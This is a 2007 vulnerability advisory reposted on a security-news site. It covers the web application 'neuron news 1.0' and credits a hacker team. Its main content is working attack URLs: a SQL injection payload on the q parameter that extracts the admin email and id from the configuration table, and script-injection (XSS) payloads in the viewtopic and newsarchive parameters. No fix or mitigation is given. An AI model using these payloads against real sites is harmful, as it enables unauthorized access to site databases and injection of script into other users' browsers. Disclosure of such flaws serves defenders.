Computer Security

Security Advisory: neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Multiple xss in mambo 4.6.2

  PHP Security Framework: Vuln and Security Bypass

  Uber Uploader <= 5.3.6 Remote File Upload Vulnerability

  SurgeMail v.38k4 webmail Host header crash

From:hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:18.12.2007
Subject:neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)

          
  ####################################################################
  #                                                                  #
  #  ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::....  #
  #                        (sql injection/xss)                       #           
  ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,
id/**/from/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)<
/script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)
</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)
</script>&newsmonth=<script>alert(111111)</script>

########################
g00d l0uck
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru